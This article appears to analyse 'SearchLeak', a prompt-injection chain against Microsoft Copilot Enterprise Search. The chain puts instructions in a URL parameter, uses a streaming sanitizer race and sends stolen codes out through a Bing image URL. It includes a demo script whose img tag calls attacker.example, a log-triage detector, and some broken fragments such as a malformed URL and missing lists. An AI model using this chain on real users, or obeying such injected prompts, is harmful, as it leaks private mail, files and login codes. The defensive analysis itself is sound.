SearchLeak wasn't a single catastrophic bug. It was a chain of three smaller weaknesses, each one carefully exploited in sequence. Alone, none of them would have been a crisis. Together, they formed a silent one-click exfiltration pipeline that could reach anything the signed-in user could access through Microsoft Graph: emails, calendar invites, meeting notes, SharePoint documents, and OneDrive files.
Crucially, it underscored a pattern security researchers had been warning about. In January 2026, the same lab at Varonis disclosed Reprompt, a near-identical one-click attack against the consumer-facing Copilot Personal. Even earlier, in June 2025, Aim Security had revealed EchoLeak, a zero-click vulnerability that weaponized a prompt injection embedded in a malicious document. The arrival of SearchLeak demonstrated that enterprise-grade guardrails hadn't eliminated the underlying risk class—they'd only raised the bar for attackers to get creative.
Each link in the SearchLeak chain is instructive on its own, but their combined effect is what made the attack so potent.
Copilot Enterprise Search accepts a URL parameter—q—that contains the user's natural-language query. Varonis researchers found that the parameter didn't just accept a search phrase; it accepted arbitrary prompt instructions.
An attacker could craft a URL that, when loaded by an authenticated user, instructed Copilot to do something entirely different from what the link appeared to show. For example, a link could tell the AI to search the victim's mailbox for a one-time MFA code, embed that code in an image URL, and append it to the response. The victim saw a Microsoft-branded search page. Copilot silently obeyed the injected prompt.
This technique, which Varonis calls Parameter-to-Prompt (P2P) injection, was the same mechanism at the heart of the earlier Reprompt attack against Copilot Personal.
When Copilot generates output that includes HTML markup (like an <img> tag), a server-side sanitizer is supposed to wrap the output in code blocks so the browser treats it as harmless plaintext. The problem? The wrapping only happens after the content is fully generated.
The browser, however, starts rendering the response while it's still streaming in. An attacker's injected <img> tag therefore fires its request as soon as it appears in the stream—before the sanitizer even runs. By the time the code block appears, the image URL has already been requested, and the data encoded in its path has already left the victim's browser.
This is a classic race condition turned lethal by the context of AI-generated content. An older defense mechanism hadn't been redesigned for a world where the AI output itself is attacker-controlled.
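The ordering problem described above can be reproduced in a few lines. This is an added example, not code from Microsoft or Varonis: the chunked output and the attacker.example host are constructed, and per-chunk escaping is shown as one possible fix, not as the fix Microsoft shipped.

```python
import html
import re

# Constructed model output, split the way a token stream might split it.
# attacker.example is a placeholder host, not taken from the article.
CHUNKS = ["Here are your results. ", "<im", 'g src="https://attacker.example/',
          'CODE_000000/x.png">', " Done."]

IMG_TAG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)

def live_img_tags(emitted):
    """Tags a progressively rendering client would act on: it parses the
    concatenation of everything received so far, not individual chunks."""
    return IMG_TAG.findall("".join(emitted))

def first_live_index(chunks):
    """Index of the chunk at which a complete <img> tag first exists client-side."""
    for i in range(len(chunks)):
        if live_img_tags(chunks[: i + 1]):
            return i
    return None

def sanitize_after_generation(chunks):
    """Flawed ordering: raw chunks are forwarded, wrapping happens only at the end."""
    sent = list(chunks)  # every chunk is already on the wire at this point
    final_view = "<pre><code>" + html.escape("".join(sent)) + "</code></pre>"
    return sent, final_view

def escape_while_streaming(chunks):
    """Encode each chunk before it is sent. Escaping is per character, so a
    tag split across chunk boundaries is neutralised just the same."""
    for chunk in chunks:
        yield html.escape(chunk, quote=True)

if __name__ == "__main__":
    sent, final_view = sanitize_after_generation(CHUNKS)
    print("tag becomes live at chunk", first_live_index(sent), "of", len(sent) - 1)
    print("final wrapped view, live tags:", live_img_tags([final_view]))
    print("escaped stream, live tags:", live_img_tags(escape_while_streaming(CHUNKS)))
```

The final wrapped view is clean in both cases; the difference is only visible when you look at what the client had already received before the last chunk arrived.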
Even with the earlier two stages in place, a final roadblock existed: the Content Security Policy (CSP) on Microsoft's m365.cloud.microsoft domain blocks images from arbitrary external servers. However, *.bing.com is allowlisted.
Bing's "Search by Image" endpoint lets a URL be fetched server-side. In the SearchLeak exploit, the attacker appended the stolen data as part of the image search path (e.g., https://www.bing.com/images/search?q=/Your_Security_Code_847291/img.pngbing.com. And since Bing fetched the image server-side, the exfiltrated data was logged without ever returning through the victim's browser.
The attacker simply monitored the logs of their own image endpoint, which Bing's server had been tricked into hitting.
The entire chain executed automatically. A victim clicked a link. Copilot searched their own data. The output streamed to the browser. An <img> tag fired. Bing's server fetched the attacker's URL. The data was exfiltrated. All of this happened before the user's browser had finished rendering the page.
The attack was hard to detect because:
The data that could be stolen wasn't theoretical. Researchers highlighted one-time MFA codes and password-reset links that remain valid for minutes, along with calendar details and sensitive documents indexed by Copilot.
CVE-2026-42824 sparked a brief debate over severity ratings. Microsoft assigned the vulnerability its highest internal severity label—Critical—but issued a CVSS v3.1 base score of 6.5 (Medium). The reasoning: the attack required user interaction (the single click), which reduced the score.
Some sources reported a 7.5 (High) score from the National Vulnerability Database (NVD). In practice, however, multiple reviews including TNW's analysis noted that both the Microsoft CSAF record and the NVD entry reflected an identical 6.5 vector. The perception of a higher score may have come from independent analysts calculating under wider impact assumptions or echoing early reporting.
Regardless of the number, the consensus was clear: a single click could expose an organization's most sensitive data.
SearchLeak didn't appear in a vacuum. It joined two other landmark AI-exfiltration discoveries:
The through-line is prompt injection, a threat that turns the AI's core capability—following instructions—into an attack surface. Each subsequent vulnerability has shown that patching one surface (Consumer vs. Enterprise) or adding guardrails (document processing vs. search queries) doesn't eliminate the class; it only redirects attacker creativity.
SearchLeak itself is patched and requires no customer action. But the technique isn't going away, and security teams should operationalize the lessons.
Monitor Copilot Search URLs. The q parameter is still exposed. Look for encoded HTML, script-like payloads, or suspiciously long instruction strings in Copilot Enterprise Search URLs flowing through your proxy logs.
Watch for anomalous outbound requests to Bing image endpoints. A user suddenly generating multiple requests to *.bing.com with unusual image search paths—especially patterns that resemble encoded or exfiltrated data—should raise alarms.
Limit Copilot's indexed surface. Practice least-privilege data governance. Constrain which SharePoint sites, OneDrive folders, and mailboxes Copilot can index so that a future vulnerability doesn't equate to the theft of everything the user can reach. Regularly audit and reduce Copilot's Microsoft Graph permissions.
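The two monitoring recommendations above can be turned into a first-pass triage over proxy logs. This is an added example, not a Microsoft or Varonis detection rule: the log entries are constructed, the Copilot /search path is a placeholder, and the length threshold and patterns are assumptions to tune against your own traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

COPILOT_HOST = "m365.cloud.microsoft"   # host named in the article
MAX_Q_LEN = 200                         # assumed threshold, tune locally
MARKUP = re.compile(r"<\s*/?\s*[a-zA-Z]+[^>]*>|!\[[^\]]*\]\(")
PATHLIKE = re.compile(r"^(?:[a-z]+:)?/|\.(?:png|jpe?g|gif|svg)$", re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding, which hides markup from naive matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(url):
    """Return the reasons a proxied URL deserves review (empty list = none)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    q = fully_decode(" ".join(parse_qs(parts.query).get("q", [])))
    reasons = []
    if host == COPILOT_HOST and q:
        if MARKUP.search(q):
            reasons.append("copilot-q-markup")
        if len(q) > MAX_Q_LEN:
            reasons.append("copilot-q-long")
    if (host == "bing.com" or host.endswith(".bing.com")) \
            and parts.path.startswith("/images/search") and PATHLIKE.search(q):
        reasons.append("bing-image-q-pathlike")
    return reasons

# Constructed proxy entries (user, URL); the /search path is a placeholder.
SAMPLE = [
    ("alice", "https://m365.cloud.microsoft/search?q=quarterly+sales+deck"),
    ("bob", "https://m365.cloud.microsoft/search?q=notes%2520%253Cimg%2520src%253Dx%253E"),
    ("bob", "https://www.bing.com/images/search?q=/Your_Security_Code_847291/img.png"),
    ("carol", "https://www.bing.com/images/search?q=golden+retriever"),
]

def triage(entries):
    """Flatten per-URL findings into (user, reason) pairs for correlation."""
    return [(user, reason) for user, url in entries for reason in classify(url)]

if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(hit)
```

A Copilot finding followed shortly by a Bing finding for the same user is a stronger signal than either alone, so correlate the pairs by user and time window in your SIEM.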
The SearchLeak disclosure was not a story about a single patch, but a warning about the evolving intersection of prompt injection and classic web vulnerabilities. As organizations adopt AI copilots with deep access to their data, security models that treat AI output as trusted content must be reconsidered. The next chain won't use the same three bugs—but it will almost certainly reuse the same pattern.